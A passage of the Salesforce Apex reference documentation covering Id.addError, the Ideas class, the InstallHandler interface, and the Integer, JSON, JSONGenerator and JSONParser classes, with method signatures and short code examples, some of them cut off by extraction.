\u2028, \u2029, and \u00a9. This results in the HTML markup not being rendered; instead it is displayed as text in the
Salesforce user interface.
Example
public class MyException extends Exception{}
Trigger.new[0].Id.addError(new myException('Invalid Id'));
addError(Exception, Boolean)
Marks a record with a custom error message and prevents any DML operation from occurring.
Signature
public Void addError(Exception exceptionError, Boolean escape)
Parameters
exceptionError
Type: System.Exception
An Exception object or a custom exception object that contains the error message to mark the record with.
1493
Reference
Id Class
escape
Type: Boolean
Indicates whether any HTML markup in the custom error message should be escaped (true) or not (false).
Return Value
Type: Void
Usage
The escaped characters are: \n, <, >, &, ", \, \u2028, \u2029, and \u00a9. This results in the HTML markup not being rendered;
instead it is displayed as text in the Salesforce user interface.
Warning: Be cautious if you specify false for the escape argument. Unescaped strings displayed in the Salesforce user
interface can represent a vulnerability in the system because these strings might contain harmful code. If you want to include
HTML markup in the error message, call this method with a false escape argument and make sure you escape any dynamic
content, such as input field values. Otherwise, specify true for the escape argument or call addError(Exception e)
instead.
Example
public class MyException extends Exception{}
account a = new account();
a.addError(new MyException('Invalid Id & other issues'), false);
getSObjectType()
Returns the token for the sObject corresponding to this ID. This method is primarily used with describe information.
Signature
public Schema.SObjectType getSObjectType()
Return Value
Type: Schema.SObjectType
Usage
For more information about describes, see Understanding Apex Describe Information.
Example
account a = new account(name = 'account');
insert a;
Id myId = a.id;
system.assertEquals(Schema.Account.SObjectType, myId.getSobjectType());
1494
Reference
Ideas Class
valueOf(String)
Converts the specified String into an ID and returns the ID.
Signature
public static ID valueOf(String toID)
Parameters
toID
Type: String
Return Value
Type: ID
Example
Id myId = Id.valueOf('001xa000003DIlo');
Ideas Class
Represents zone ideas.
Namespace
System
Usage
Ideas is a community of users who post, vote for, and comment on ideas. An Ideas community provides an online, transparent way for
you to attract, manage, and showcase innovation.
A set of recent replies (returned by methods, see below) includes ideas that a user has posted or commented on that already have
comments posted by another user. The returned ideas are listed based on the time of the last comment made by another user, with the
most recent ideas appearing first.
The userID argument is a required argument that filters the results so only the ideas that the specified user has posted or commented
on are returned.
The communityID argument filters the results so only the ideas within the specified zone are returned. If this argument is the empty
string, then all recent replies for the specified user are returned regardless of the zone.
For more information on ideas, see Using Ideas in the Salesforce online help.
Example
The following example finds ideas in a specific zone that have similar titles as a new idea:
public class FindSimilarIdeasController {
1495
Reference
Ideas Class
The following example uses a Visualforce page in conjunction with a custom controller, that is, a special Apex class. For more information
on Visualforce, see the Visualforce Developer's Guide.
This example creates an Apex method in the controller that returns unread recent replies. You can leverage this same example for the
getAllRecentReplies and getReadRecentReplies methods. For this example to work, there must be ideas posted to
the zone. In addition, at least one zone member must have posted a comment to another zone member's idea or comment.
// Create an Apex method to retrieve the recent replies marked as unread in all communities
public class IdeasController {
public Idea[] getUnreadRecentReplies() {
Idea[] recentReplies;
if (recentReplies == null) {
Id[] recentRepliesIds = Ideas.getUnreadRecentReplies(UserInfo.getUserId(), '');
recentReplies = [SELECT Id, Title FROM Idea WHERE Id IN :recentRepliesIds];
}
return recentReplies;
}
}
The following is the markup for a Visualforce page that uses the above custom controller to list unread recent replies.
<apex:page controller="IdeasController" showHeader="false">
<apex:dataList value="{!unreadRecentReplies}" var="recentReplyIdea">
<a href="/apex/viewIdea?id={!recentReplyIdea.Id}">
<apex:outputText value="{!recentReplyIdea.Title}" escape="true"/></a>
</apex:dataList>
</apex:page>
The following example uses a Visualforce page in conjunction with a custom controller to list ideas. Then, a second Visualforce page
and custom controller is used to display a specific idea and mark it as read. For this example to work, there must be ideas posted to the
zone.
// Create a controller to use on a VisualForce page to list ideas
public class IdeaListController {
1496
Reference
Ideas Class
The following is the markup for a Visualforce page that uses the above custom controller to list ideas:
<apex:page controller="IdeaListController" tabStyle="Idea" showHeader="false">
<apex:dataList value="{!ideas}" var="idea" id="ideaList">
<a href="/apex/viewIdea?id={!idea.id}">
<apex:outputText value="{!idea.title}" escape="true"/></a>
</apex:dataList>
</apex:page>
The following example also uses a Visualforce page and custom controller, this time, to display the idea that is selected on the above
idea list page. In this example, the markRead method marks the selected idea and associated comments as read by the user that is
currently logged in. Note that the markRead method is in the constructor so that the idea is marked read immediately when the user
goes to a page that uses this controller. For this example to work, there must be ideas posted to the zone. In addition, at least one zone
member must have posted a comment to another zone member's idea or comment.
// Create an Apex method in the controller that marks all comments as read for the
// selected idea
public class ViewIdeaController {
private final String id = System.currentPage().getParameters().get('id');
public ViewIdeaController(ApexPages.StandardController controller) {
Ideas.markRead(id);
}
}
The following is the markup for a Visualforce page that uses the above custom controller to display the idea as read.
<apex:page standardController="Idea" extensions="ViewIdeaController" showHeader="false">
<h2><apex:outputText value="{!idea.title}" /></h2>
<apex:outputText value="{!idea.body}" />
</apex:page>
1497
Reference
Ideas Class
Ideas Methods
The following are methods for Ideas. All methods are static.
IN THIS SECTION:
findSimilar(Idea)
Returns a list similar ideas based on the title of the specified idea.
getAllRecentReplies(String, String)
Returns ideas that have recent replies for the specified user or zone. This includes all read and unread replies.
getReadRecentReplies(String, String)
Returns ideas that have recent replies marked as read.
getUnreadRecentReplies(String, String)
Returns ideas that have recent replies marked as unread.
markRead(String)
Marks all comments as read for the user that is currently logged in.
findSimilar(Idea)
Returns a list similar ideas based on the title of the specified idea.
Signature
public static ID[] findSimilar(Idea idea)
Parameters
idea
Type: Idea
Return Value
Type: ID[]
Usage
Each findSimilar call counts against the SOSL statement governor limit allowed for the process.
getAllRecentReplies(String, String)
Returns ideas that have recent replies for the specified user or zone. This includes all read and unread replies.
Signature
public static ID[] getAllRecentReplies(String userID, String communityID)
1498
Reference
Ideas Class
Parameters
userID
Type: String
communityID
Type: String
Return Value
Type: ID[]
getReadRecentReplies(String, String)
Returns ideas that have recent replies marked as read.
Signature
public static ID[] getReadRecentReplies(String userID, String communityID)
Parameters
userID
Type: String
communityID
Type: String
Return Value
Type: ID[]
getUnreadRecentReplies(String, String)
Returns ideas that have recent replies marked as unread.
Signature
public static ID[] getUnreadRecentReplies(String userID, String communityID)
Parameters
userID
Type: String
communityID
Type: String
Return Value
Type: ID[]
1499
Reference
InstallHandler Interface
markRead(String)
Marks all comments as read for the user that is currently logged in.
Signature
public static Void markRead(String ideaID)
Parameters
ideaID
Type: String
Return Value
Type: Void
InstallHandler Interface
Enables custom code to run after a managed package installation or upgrade.
Namespace
System
Usage
App developers can implement this interface to specify Apex code that runs automatically after a subscriber installs or upgrades a
managed package. This makes it possible to customize the package install or upgrade, based on details of the subscribers organization.
For instance, you can use the script to populate custom settings, create sample data, send an email to the installer, notify an external
system, or kick off a batch operation to populate a new field across a large set of data.
The post install script is invoked after tests have been run, and is subject to default governor limits. It runs as a special system user that
represents your package, so all operations performed by the script appear to be done by your package. You can access this user by using
UserInfo. You will only see this user at runtime, not while running tests.
If the script fails, the install/upgrade is aborted. Any errors in the script are emailed to the user specified in the Notify on Apex Error
field of the package. If no user is specified, the install/upgrade details will be unavailable.
The post install script has the following additional properties.
It can initiate batch, scheduled, and future jobs.
It cant access Session IDs.
It can only perform callouts using an async operation. The callout occurs after the script is run and the install is complete and
committed.
The InstallHandler interface has a single method called onInstall, which specifies the actions to be performed on
install/upgrade.
global interface InstallHandler {
void onInstall(InstallContext context)
};
The onInstall method takes a context object as its argument, which provides the following information.
1500
Reference
InstallHandler Interface
IN THIS SECTION:
InstallHandler Methods
InstallHandler Example Implementation
InstallHandler Methods
The following are methods for InstallHandler.
IN THIS SECTION:
onInstall(InstallContext)
Specifies the actions to be performed on install/upgrade.
onInstall(InstallContext)
Specifies the actions to be performed on install/upgrade.
Signature
public Void onInstall(InstallContext context)
Parameters
context
Type: System.InstallContext
Return Value
Type: Void
1501
Reference
InstallHandler Interface
You can test a post install script using the new testInstall method of the Test class. This method takes the following arguments.
A class that implements the InstallHandler interface.
A Version object that specifies the version number of the existing package.
1502
Reference
Integer Class
An optional Boolean value that is true if the installation is a push. The default is false.
This sample shows how to test a post install script implemented in the PostInstallClass Apex class.
@isTest
static void testInstallScript() {
PostInstallClass postinstall = new PostInstallClass();
Test.testInstall(postinstall, null);
Test.testInstall(postinstall, new Version(1,0), true);
List<Account> a = [Select id, name from Account where name ='Newco'];
System.assertEquals(a.size(), 1, 'Account not found');
}
Integer Class
Contains methods for the Integer primitive data type.
Namespace
System
Usage
For more information on integers, see Primitive Data Types on page 26.
Integer Methods
The following are methods for Integer.
IN THIS SECTION:
format()
Returns the integer as a string using the locale of the context user.
valueOf(String)
Returns an Integer that contains the value of the specified String. As in Java, the String is interpreted as representing a signed decimal
integer.
valueOf(Object)
Converts the specified history tracking field value to an Integer value.
format()
Returns the integer as a string using the locale of the context user.
Signature
public String format()
Return Value
Type: String
1503
Reference
Integer Class
Example
integer myInt = 22;
system.assertEquals('22', myInt.format());
valueOf(String)
Returns an Integer that contains the value of the specified String. As in Java, the String is interpreted as representing a signed decimal
integer.
Signature
public static Integer valueOf(String toInteger)
Parameters
toInteger
Type: String
Return Value
Type: Integer
Example
Integer myInt = Integer.valueOf('123');
valueOf(Object)
Converts the specified history tracking field value to an Integer value.
Signature
public static Integer valueOf(Object fieldValue)
Parameters
fieldValue
Type: Object
Return Value
Type: Integer
Usage
Use this method with the OldValue or NewValue fields of history sObjects, such as AccountHistory, when the field type
corresponds to an Integer type, like a number field.
Example:
1504
Reference
JSON Class
Example
List<AccountHistory> ahlist =
[SELECT Field,OldValue,NewValue
FROM AccountHistory];
for(AccountHistory ah : ahlist) {
System.debug('Field: ' + ah.Field);
if (ah.field == 'NumberOfEmployees') {
Integer oldValue =
Integer.valueOf(ah.OldValue);
Integer newValue =
Integer.valueOf(ah.NewValue);
}
JSON Class
Contains methods for serializing Apex objects into JSON format and deserializing JSON content that was serialized using the serialize
method in this class.
Namespace
System
Usage
Use the methods in the System.JSON class to perform round-trip JSON serialization and deserialization of Apex objects.
JSON Methods
The following are methods for JSON. All methods are static.
IN THIS SECTION:
createGenerator(Boolean)
Returns a new JSON generator.
createParser(String)
Returns a new JSON parser.
deserialize(String, System.Type)
Deserializes the specified JSON string into an Apex object of the specified type.
deserializeStrict(String, System.Type)
Deserializes the specified JSON string into an Apex object of the specified type.
deserializeUntyped(String)
Deserializes the specified JSON string into collections of primitive data types.
serialize(Object)
Serializes Apex objects into JSON content.
serializePretty(Object)
Serializes Apex objects into JSON content and generates indented content using the pretty-print format.
1505
Reference
JSON Class
createGenerator(Boolean)
Returns a new JSON generator.
Signature
public static System.JSONGenerator createGenerator(Boolean pretty)
Parameters
pretty
Type: Boolean
Determines whether the JSON generator creates JSON content in pretty-print format with the content indented. Set to true to
create indented content.
Return Value
Type: System.JSONGenerator
createParser(String)
Returns a new JSON parser.
Signature
public static System.JSONParser createParser(String jsonString)
Parameters
jsonString
Type: String
The JSON content to parse.
Return Value
Type: System.JSONParser
deserialize(String, System.Type)
Deserializes the specified JSON string into an Apex object of the specified type.
Signature
public static Object deserialize(String jsonString, System.Type apexType)
Parameters
jsonString
Type: String
The JSON content to deserialize.
1506
Reference
JSON Class
apexType
Type: System.Type
The Apex type of the object that this method creates after deserializing the JSON content.
Return Value
Type: Object
Usage
If the JSON content to parse contains attributes not present in the Apex type specified in the argument, such as a missing field or object,
this method ignores these attributes and parses the rest of the JSON content. However, for Apex saved using Salesforce API version 24.0
or earlier, this method throws a run-time exception for missing attributes.
Example
The following example deserializes a Decimal value.
Decimal n = (Decimal)JSON.deserialize(
'100.1', Decimal.class);
System.assertEquals(n, 100.1);
deserializeStrict(String, System.Type)
Deserializes the specified JSON string into an Apex object of the specified type.
Signature
public static Object deserializeStrict(String jsonString, System.Type apexType)
Parameters
jsonString
Type: String
The JSON content to deserialize.
apexType
Type: System.Type
The Apex type of the object that this method creates after deserializing the JSON content.
Return Value
Type: Object
Usage
All attributes in the JSON string must be present in the specified type.If the JSON content to parse contains attributes not present in the
Apex type specified in the argument, such as a missing field or object, this method throws a run-time exception.
1507
Reference
JSON Class
Example
The following example deserializes a JSON string into an object of a user-defined type represented by the Car class, which this example
also defines.
public class Car {
public String make;
public String year;
}
public void parse() {
Car c = (Car)JSON.deserializeStrict(
'{"make":"SFDC","year":"2020"}',
Car.class);
System.assertEquals(c.make, 'SFDC');
System.assertEquals(c.year, '2020');
}
deserializeUntyped(String)
Deserializes the specified JSON string into collections of primitive data types.
Signature
public static Object deserializeUntyped(String jsonString)
Parameters
jsonString
Type: String
The JSON content to deserialize.
Return Value
Type: Object
Example
The following example deserializes a JSON representation of an appliance object into a map that contains primitive data types and
further collections of primitive types. It then verifies the deserialized values.
String jsonInput = '{\n' +
' "description" :"An appliance",\n' +
' "accessories" : [ "powerCord", ' +
'{ "right":"door handle1", ' +
'"left":"door handle2" } ],\n' +
' "dimensions" : ' +
'{ "height" : 5.5 , ' +
'"width" : 3.0 , ' +
'"depth" : 2.2 },\n' +
' "type" : null,\n' +
' "inventory" : 2000,\n' +
' "price" : 1023.45,\n' +
1508
Reference
JSON Class
serialize(Object)
Serializes Apex objects into JSON content.
Signature
public static String serialize(anyType object)
Parameters
anyType
Type: Object
The Apex object to serialize.
1509
Reference
JSONGenerator Class
Return Value
Type: String
Example
The following example serializes a new Datetime value.
Datetime dt = Datetime.newInstance(
Date.newInstance(
2011, 3, 22),
Time.newInstance(
1, 15, 18, 0));
String str = JSON.serialize(dt);
System.assertEquals(
'"2011-03-22T08:15:18.000Z"',
str);
serializePretty(Object)
Serializes Apex objects into JSON content and generates indented content using the pretty-print format.
Signature
public static String serializePretty(Object anyType)
Parameters
anyType
Type: Object
The Apex object to serialize.
Return Value
Type: String
JSONGenerator Class
Contains methods used to serialize objects into JSON content using the standard JSON encoding.
Namespace
System
Usage
The System.JSONGenerator class is provided to enable the generation of standard JSON-encoded content and gives you more
control on the structure of the JSON output.
1510
Reference
JSONGenerator Class
JSONGenerator Methods
The following are methods for JSONGenerator. All are instance methods.
IN THIS SECTION:
close()
Closes the JSON generator.
getAsString()
Returns the generated JSON content.
isClosed()
Returns true if the JSON generator is closed; otherwise, returns false.
writeBlob(Blob)
Writes the specified Blob value as a base64-encoded string.
writeBlobField(String, Blob)
Writes a field name and value pair using the specified field name and BLOB value.
writeBoolean(Boolean)
Writes the specified Boolean value.
writeBooleanField(String, Boolean)
Writes a field name and value pair using the specified field name and Boolean value.
writeDate(Date)
Writes the specified date value in the ISO-8601 format.
writeDateField(String, Date)
Writes a field name and value pair using the specified field name and date value. The date value is written in the ISO-8601 format.
writeDateTime(Datetime)
Writes the specified date and time value in the ISO-8601 format.
writeDateTimeField(String, Datetime)
Writes a field name and value pair using the specified field name and date and time value. The date and time value is written in the
ISO-8601 format.
writeEndArray()
Writes the ending marker of a JSON array (']').
writeEndObject()
Writes the ending marker of a JSON object ('}').
writeFieldName(String)
Writes a field name.
writeId(ID)
Writes the specified ID value.
writeIdField(String, Id)
Writes a field name and value pair using the specified field name and identifier value.
writeNull()
Writes the JSON null literal value.
1511
Reference
JSONGenerator Class
writeNullField(String)
Writes a field name and value pair using the specified field name and the JSON null literal value.
writeNumber(Decimal)
Writes the specified decimal value.
writeNumber(Double)
Writes the specified double value.
writeNumber(Integer)
Writes the specified integer value.
writeNumber(Long)
Writes the specified long value.
writeNumberField(String, Decimal)
Writes a field name and value pair using the specified field name and decimal value.
writeNumberField(String, Double)
Writes a field name and value pair using the specified field name and double value.
writeNumberField(String, Integer)
Writes a field name and value pair using the specified field name and integer value.
writeNumberField(String, Long)
Writes a field name and value pair using the specified field name and long value.
writeObject(Any type)
Writes the specified Apex object in JSON format.
writeObjectField(String, Any type)
Writes a field name and value pair using the specified field name and Apex object.
writeStartArray()
Writes the starting marker of a JSON array ('[').
writeStartObject()
Writes the starting marker of a JSON object ('{').
writeString(String)
Writes the specified string value.
writeStringField(String, String)
Writes a field name and value pair using the specified field name and string value.
writeTime(Time)
Writes the specified time value in the ISO-8601 format.
writeTimeField(String, Time)
Writes a field name and value pair using the specified field name and time value in the ISO-8601 format.
close()
Closes the JSON generator.
Signature
public Void close()
1512
Reference
JSONGenerator Class
Return Value
Type: Void
Usage
No more content can be written after the JSON generator is closed.
getAsString()
Returns the generated JSON content.
Signature
public String getAsString()
Return Value
Type: String
Usage
This method closes the JSON generator if it isn't closed already.
isClosed()
Returns true if the JSON generator is closed; otherwise, returns false.
Signature
public Boolean isClosed()
Return Value
Type: Boolean
writeBlob(Blob)
Writes the specified Blob value as a base64-encoded string.
Signature
public Void writeBlob(Blob blobValue)
Parameters
blobValue
Type: Blob
Return Value
Type: Void
1513
Reference
JSONGenerator Class
writeBlobField(String, Blob)
Writes a field name and value pair using the specified field name and BLOB value.
Signature
public Void writeBlobField(String fieldName, Blob blobValue)
Parameters
fieldName
Type: String
blobValue
Type: Blob
Return Value
Type: Void
writeBoolean(Boolean)
Writes the specified Boolean value.
Signature
public Void writeBoolean(Boolean blobValue)
Parameters
blobValue
Type: Boolean
Return Value
Type: Void
writeBooleanField(String, Boolean)
Writes a field name and value pair using the specified field name and Boolean value.
Signature
public Void writeBooleanField(String fieldName, Boolean booleanValue)
Parameters
fieldName
Type: String
booleanValue
Type: Boolean
1514
Reference
JSONGenerator Class
Return Value
Type: Void
writeDate(Date)
Writes the specified date value in the ISO-8601 format.
Signature
public Void writeDate(Date dateValue)
Parameters
dateValue
Type: Date
Return Value
Type: Void
writeDateField(String, Date)
Writes a field name and value pair using the specified field name and date value. The date value is written in the ISO-8601 format.
Signature
public Void writeDateField(String fieldName, Date dateValue)
Parameters
fieldName
Type: String
dateValue
Type: Date
Return Value
Type: Void
writeDateTime(Datetime)
Writes the specified date and time value in the ISO-8601 format.
Signature
public Void writeDateTime(Datetime datetimeValue)
1515
Reference
JSONGenerator Class
Parameters
datetimeValue
Type: Datetime
Return Value
Type: Void
writeDateTimeField(String, Datetime)
Writes a field name and value pair using the specified field name and date and time value. The date and time value is written in the
ISO-8601 format.
Signature
public Void writeDateTimeField(String fieldName, Datetime datetimeValue)
Parameters
fieldName
Type: String
datetimeValue
Type: Datetime
Return Value
Type: Void
writeEndArray()
Writes the ending marker of a JSON array (']').
Signature
public Void writeEndArray()
Return Value
Type: Void
writeEndObject()
Writes the ending marker of a JSON object ('}').
Signature
public Void writeEndObject()
1516
Reference
JSONGenerator Class
Return Value
Type: Void
writeFieldName(String)
Writes a field name.
Signature
public Void writeFieldName(String fieldName)
Parameters
fieldName
Type: String
Return Value
Type: Void
writeId(ID)
Writes the specified ID value.
Signature
public Void writeId(ID identifier)
Parameters
identifier
Type: ID
Return Value
Type: Void
writeIdField(String, Id)
Writes a field name and value pair using the specified field name and identifier value.
Signature
public Void writeIdField(String fieldName, Id identifier)
Parameters
fieldName
Type: String
1517
Reference
JSONGenerator Class
identifier
Type: ID
Return Value
Type: Void
writeNull()
Writes the JSON null literal value.
Signature
public Void writeNull()
Return Value
Type: Void
writeNullField(String)
Writes a field name and value pair using the specified field name and the JSON null literal value.
Signature
public Void writeNullField(String fieldName)
Parameters
fieldName
Type: String
Return Value
Type: Void
writeNumber(Decimal)
Writes the specified decimal value.
Signature
public Void writeNumber(Decimal number)
Parameters
number
Type: Decimal
1518
Reference
JSONGenerator Class
Return Value
Type: Void
writeNumber(Double)
Writes the specified double value.
Signature
public Void writeNumber(Double number)
Parameters
number
Type: Double
Return Value
Type: Void
writeNumber(Integer)
Writes the specified integer value.
Signature
public Void writeNumber(Integer number)
Parameters
number
Type: Integer
Return Value
Type: Void
writeNumber(Long)
Writes the specified long value.
Signature
public Void writeNumber(Long number)
Parameters
number
Type: Long
1519
Reference
JSONGenerator Class
Return Value
Type: Void
writeNumberField(String, Decimal)
Writes a field name and value pair using the specified field name and decimal value.
Signature
public Void writeNumberField(String fieldName, Decimal number)
Parameters
fieldName
Type: String
number
Type: Decimal
Return Value
Type: Void
writeNumberField(String, Double)
Writes a field name and value pair using the specified field name and double value.
Signature
public Void writeNumberField(String fieldName, Double number)
Parameters
fieldName
Type: String
number
Type: Double
Return Value
Type: Void
writeNumberField(String, Integer)
Writes a field name and value pair using the specified field name and integer value.
Signature
public Void writeNumberField(String fieldName, Integer number)
1520
Reference
JSONGenerator Class
Parameters
fieldName
Type: String
number
Type: Integer
Return Value
Type: Void
writeNumberField(String, Long)
Writes a field name and value pair using the specified field name and long value.
Signature
public Void writeNumberField(String fieldName, Long number)
Parameters
fieldName
Type: String
number
Type: Long
Return Value
Type: Void
writeObject(Any type)
Writes the specified Apex object in JSON format.
Signature
public Void writeObject(Object anyType)
Parameters
anyType
Type: Object
Return Value
Type: Void
1521
Reference
JSONGenerator Class
Signature
public Void writeObjectField(String fieldName, Object anyType)
Parameters
fieldName
Type: String
anyType
Type: Object
Return Value
Type: Void
writeStartArray()
Writes the starting marker of a JSON array ('[').
Signature
public Void writeStartArray()
Return Value
Type: Void
writeStartObject()
Writes the starting marker of a JSON object ('{').
Signature
public Void writeStartObject()
Return Value
Type: Void
writeString(String)
Writes the specified string value.
Signature
public Void writeString(String stringValue)
Parameters
stringValue
Type: String
1522
Reference
JSONGenerator Class
Return Value
Type: Void
writeStringField(String, String)
Writes a field name and value pair using the specified field name and string value.
Signature
public Void writeStringField(String fieldName, String stringValue)
Parameters
fieldName
Type: String
stringValue
Type: String
Return Value
Type: Void
writeTime(Time)
Writes the specified time value in the ISO-8601 format.
Signature
public Void writeTime(Time timeValue)
Parameters
timeValue
Type: Time
Return Value
Type: Void
writeTimeField(String, Time)
Writes a field name and value pair using the specified field name and time value in the ISO-8601 format.
Signature
public Void writeTimeField(String fieldName, Time timeValue)
1523
Reference
JSONParser Class
Parameters
fieldName
Type: String
timeValue
Type: Time
Return Value
Type: Void
JSONParser Class
Represents a parser for JSON-encoded content.
Namespace
System
Usage
Use the System.JSONParser methods to parse a response that's returned from a call to an external service that is in JSON format,
such as a JSON-encoded response of a Web service callout.
JSONParser Methods
The following are methods for JSONParser. All are instance methods.
IN THIS SECTION:
clearCurrentToken()
Removes the current token.
getBlobValue()
Returns the current token as a BLOB value.
getBooleanValue()
Returns the current token as a Boolean value.
getCurrentName()
Returns the name associated with the current token.
getCurrentToken()
Returns the token that the parser currently points to or null if there's no current token.
getDatetimeValue()
Returns the current token as a date and time value.
getDateValue()
Returns the current token as a date value.
getDecimalValue()
Returns the current token as a decimal value.
1524
Reference
JSONParser Class
getDoubleValue()
Returns the current token as a double value.
getIdValue()
Returns the current token as an ID value.
getIntegerValue()
Returns the current token as an integer value.
getLastClearedToken()
Returns the last token that was cleared by the clearCurrentToken method.
getLongValue()
Returns the current token as a long value.
getText()
Returns the textual representation of the current token or null if there's no current token.
getTimeValue()
Returns the current token as a time value.
hasCurrentToken()
Returns true if the parser currently points to a token; otherwise, returns false.
nextToken()
Returns the next token or null if the parser has reached the end of the input stream.
nextValue()
Returns the next token that is a value type or null if the parser has reached the end of the input stream.
readValueAs(System.Type)
Deserializes JSON content into an object of the specified Apex type and returns the deserialized object.
readValueAsStrict(System.Type)
Deserializes JSON content into an object of the specified Apex type and returns the deserialized object. All attributes in the JSON
content must be present in the specified type.
skipChildren()
Skips all child tokens of type JSONToken.START_ARRAY and JSONToken.START_OBJECT that the parser currently
points to.
clearCurrentToken()
Removes the current token.
Signature
public Void clearCurrentToken()
Return Value
Type: Void
1525
Reference
JSONParser Class
Usage
After this method is called, a call to hasCurrentToken returns false and a call to getCurrentToken returns null. You
can retrieve the cleared token by calling getLastClearedToken.
getBlobValue()
Returns the current token as a BLOB value.
Signature
public Blob getBlobValue()
Return Value
Type: Blob
Usage
The current token must be of type JSONToken.VALUE_STRING and must be Base64-encoded.
getBooleanValue()
Returns the current token as a Boolean value.
Signature
public Boolean getBooleanValue()
Return Value
Type: Boolean
Usage
The current token must be of type JSONToken.VALUE_TRUE or JSONToken.VALUE_FALSE.
The following example parses a sample JSON string and retrieves a Boolean value.
String JSONContent =
'{"isActive":true}';
JSONParser parser =
JSON.createParser(JSONContent);
// Advance to the start object marker.
parser.nextToken();
// Advance to the next value.
parser.nextValue();
// Get the Boolean value.
Boolean isActive = parser.getBooleanValue();
getCurrentName()
Returns the name associated with the current token.
1526
Reference
JSONParser Class
Signature
public String getCurrentName()
Return Value
Type: String
Usage
If the current token is of type JSONToken.FIELD_NAME, this method returns the same value as getText. If the current token is
a value, this method returns the field name that precedes this token. For other values such as array values or root-level values, this method
returns null.
The following example parses a sample JSON string. It advances to the field value and retrieves its corresponding field name.
Example
String JSONContent = '{"firstName":"John"}';
JSONParser parser =
JSON.createParser(JSONContent);
// Advance to the start object marker.
parser.nextToken();
// Advance to the next value.
parser.nextValue();
// Get the field name for the current value.
String fieldName = parser.getCurrentName();
// Get the textual representation
// of the value.
String fieldValue = parser.getText();
getCurrentToken()
Returns the token that the parser currently points to or null if there's no current token.
Signature
public System.JSONToken getCurrentToken()
Return Value
Type: System.JSONToken
Usage
The following example iterates through all the tokens in a sample JSON string.
String JSONContent = '{"firstName":"John"}';
JSONParser parser =
JSON.createParser(JSONContent);
// Advance to the next token.
while (parser.nextToken() != null) {
System.debug('Current token: ' +
1527
Reference
JSONParser Class
parser.getCurrentToken());
}
getDatetimeValue()
Returns the current token as a date and time value.
Signature
public Datetime getDatetimeValue()
Return Value
Type: Datetime
Usage
The current token must be of type JSONToken.VALUE_STRING and must represent a Datetime value in the ISO-8601 format.
The following example parses a sample JSON string and retrieves a Datetime value.
String JSONContent =
'{"transactionDate":"2011-03-22T13:01:23"}';
JSONParser parser =
JSON.createParser(JSONContent);
// Advance to the start object marker.
parser.nextToken();
// Advance to the next value.
parser.nextValue();
// Get the transaction date.
Datetime transactionDate =
parser.getDatetimeValue();
getDateValue()
Returns the current token as a date value.
Signature
public Date getDateValue()
Return Value
Type: Date
Usage
The current token must be of type JSONToken.VALUE_STRING and must represent a Date value in the ISO-8601 format.
The following example parses a sample JSON string and retrieves a Date value.
String JSONContent =
'{"dateOfBirth":"2011-03-22"}';
1528
Reference
JSONParser Class
JSONParser parser =
JSON.createParser(JSONContent);
// Advance to the start object marker.
parser.nextToken();
// Advance to the next value.
parser.nextValue();
// Get the date of birth.
Date dob = parser.getDateValue();
getDecimalValue()
Returns the current token as a decimal value.
Signature
public Decimal getDecimalValue()
Return Value
Type: Decimal
Usage
The current token must be of type JSONToken.VALUE_NUMBER_FLOAT or JSONToken.VALUE_NUMBER_INT and is a
numerical value that can be converted to a value of type Decimal.
The following example parses a sample JSON string and retrieves a Decimal value.
String JSONContent =
'{"GPA":3.8}';
JSONParser parser =
JSON.createParser(JSONContent);
// Advance to the start object marker.
parser.nextToken();
// Advance to the next value.
parser.nextValue();
// Get the GPA score.
Decimal gpa = parser.getDecimalValue();
getDoubleValue()
Returns the current token as a double value.
Signature
public Double getDoubleValue()
Return Value
Type: Double
1529
Reference
JSONParser Class
Usage
The current token must be of type JSONToken.VALUE_NUMBER_FLOAT and is a numerical value that can be converted to a
value of type Double.
The following example parses a sample JSON string and retrieves a Double value.
String JSONContent =
'{"GPA":3.8}';
JSONParser parser =
JSON.createParser(JSONContent);
// Advance to the start object marker.
parser.nextToken();
// Advance to the next value.
parser.nextValue();
// Get the GPA score.
Double gpa = parser.getDoubleValue();
getIdValue()
Returns the current token as an ID value.
Signature
public ID getIdValue()
Return Value
Type: ID
Usage
The current token must be of type JSONToken.VALUE_STRING and must be a valid ID.
The following example parses a sample JSON string and retrieves an ID value.
String JSONContent =
'{"recordId":"001R0000002nO6H"}';
JSONParser parser =
JSON.createParser(JSONContent);
// Advance to the start object marker.
parser.nextToken();
// Advance to the next value.
parser.nextValue();
// Get the record ID.
ID recordID = parser.getIdValue();
getIntegerValue()
Returns the current token as an integer value.
Signature
public Integer getIntegerValue()
1530
Reference
JSONParser Class
Return Value
Type: Integer
Usage
The current token must be of type JSONToken.VALUE_NUMBER_INT and must represent an Integer.
The following example parses a sample JSON string and retrieves an Integer value.
String JSONContent =
'{"recordCount":10}';
JSONParser parser =
JSON.createParser(JSONContent);
// Advance to the start object marker.
parser.nextToken();
// Advance to the next value.
parser.nextValue();
// Get the record count.
Integer count = parser.getIntegerValue();
getLastClearedToken()
Returns the last token that was cleared by the clearCurrentToken method.
Signature
public System.JSONToken getLastClearedToken()
Return Value
Type: System.JSONToken
getLongValue()
Returns the current token as a long value.
Signature
public Long getLongValue()
Return Value
Type: Long
Usage
The current token must be of type JSONToken.VALUE_NUMBER_INT and is a numerical value that can be converted to a value
of type Long .
The following example parses a sample JSON string and retrieves a Long value.
String JSONContent =
'{"recordCount":2097531021}';
1531
Reference
JSONParser Class
JSONParser parser =
JSON.createParser(JSONContent);
// Advance to the start object marker.
parser.nextToken();
// Advance to the next value.
parser.nextValue();
// Get the record count.
Long count = parser.getLongValue();
getText()
Returns the textual representation of the current token or null if there's no current token.
Signature
public String getText()
Return Value
Type: String
Usage
No current token exists, and therefore this method returns null, if nextToken has not been called yet for the first time or if the
parser has reached the end of the input stream.
getTimeValue()
Returns the current token as a time value.
Signature
public Time getTimeValue()
Return Value
Type: Time
Usage
The current token must be of type JSONToken.VALUE_STRING and must represent a Time value in the ISO-8601 format.
The following example parses a sample JSON string and retrieves a Datetime value.
String JSONContent =
'{"arrivalTime":"18:05"}';
JSONParser parser =
JSON.createParser(JSONContent);
// Advance to the start object marker.
parser.nextToken();
// Advance to the next value.
parser.nextValue();
1532
Reference
JSONParser Class
hasCurrentToken()
Returns true if the parser currently points to a token; otherwise, returns false.
Signature
public Boolean hasCurrentToken()
Return Value
Type: Boolean
nextToken()
Returns the next token or null if the parser has reached the end of the input stream.
Signature
public System.JSONToken nextToken()
Return Value
Type: System.JSONToken
Usage
Advances the stream enough to determine the type of the next token, if any.
nextValue()
Returns the next token that is a value type or null if the parser has reached the end of the input stream.
Signature
public System.JSONToken nextValue()
Return Value
Type: System.JSONToken
Usage
Advances the stream enough to determine the type of the next token that is of a value type, if any, including a JSON array and object
start and end markers.
